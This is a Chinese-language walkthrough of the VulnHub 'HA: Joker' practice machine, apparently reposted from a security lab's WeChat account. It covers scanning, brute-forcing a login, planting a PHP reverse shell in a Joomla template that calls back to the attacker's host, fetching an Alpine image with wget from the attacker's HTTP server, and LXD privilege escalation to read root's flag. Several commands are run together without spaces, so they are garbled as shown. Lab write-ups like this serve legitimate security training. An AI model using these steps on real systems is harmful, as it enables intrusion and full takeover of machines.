• 靶机

https://www.vulnhub.com/entry/ha-joker,379/

• 前期准备

运行环境：VM Workstation，VMEsxi

• 目标

获取 root 权限并且读取/root/final.txt

• 主机信息

在 VM Workstation 中打开导入的虚拟机，并打开kali 运行命令：

netdiscover -r 192.168.32.0/24

• 服务发现

nmap -sV -A -O -sS-p1-65535 192.168.32.141

• 目录枚举

python3 dirsearch.py -u http://192.168.32.141/ -e php,html,js,json,.txt

dirb http://192.168.32.141/ -X php,html,js,json,.txt

• 探测Web服务

访问 http://192.168.32.141/secret.txt

访问 http://192.168.32.141:8080

• 口令爆破

根据 secret.txt 中的提示信息，将/usr/share/wordlists/rockyou.txt.gz解压并截取前100作为口令，用户名取joker

head -n 100 rockyou.txt> dict.txt

得到用户名：joker，口令：hannah

访问 http://192.168.32.141:8080 ，输入用户名与口令后，发现是joomla 的 CMS

• Getshell

访问http://192.168.32.141:8080/administrator,
进入后台输入默认用户名与口令：joomla    ，登录后台。

在Extensions（扩展）菜单项选择模板管理，打开beez3模板，编辑index.php 获取 webshell；

将index.php里的代码替换为kali：/usr/share/webshells/php/php-reverse-shell.php的代码，修改IP 保存；

kali 监听1234 端口，访问http://192.168.32.141:8080（主页）获取shell

得到反弹 shell，尝试使用python pty 获取交互式 shell：

python -c 'importpty;pty.spawn("/bin/bash")' 或 python3 -c 'importpty;pty.spawn("/bin/bash")'id

• 提权

使用 LXD 提升权限，kali 执行以下操作：

git clonehttps://github.com/saghul/lxd-alpine-builder.gitcd lxd-alpine-builder./build-alpine

注意：此处编译 alpine 时最好挂个梯子，否则速度感人

使用 Python 开启 http 服务

lspython -m SimpleHTTPServer

靶机 shell 执行以下操作：

wgethttp://192.168.32.129:8000/alpine-v3.10-x86_64-20191218_2258.tar.gzlxc image import./alpine-v3.10-x86_64-20191218_2258.tar.gz --alias myimagelxc image list

最后，靶机 shell 执行以下命令获取flag

lxc init myimage ignite-c security.privileged=truelxc config device add ignite mydevice disksource=/ path=/mnt/root recursive=truelxc start ignitelxc exec ignite /bin/shidcd /mnt/root/rootlscat final.txt

原文始发于微信公众号（SK安全实验室）：Vulnhub 靶机渗透之 Joker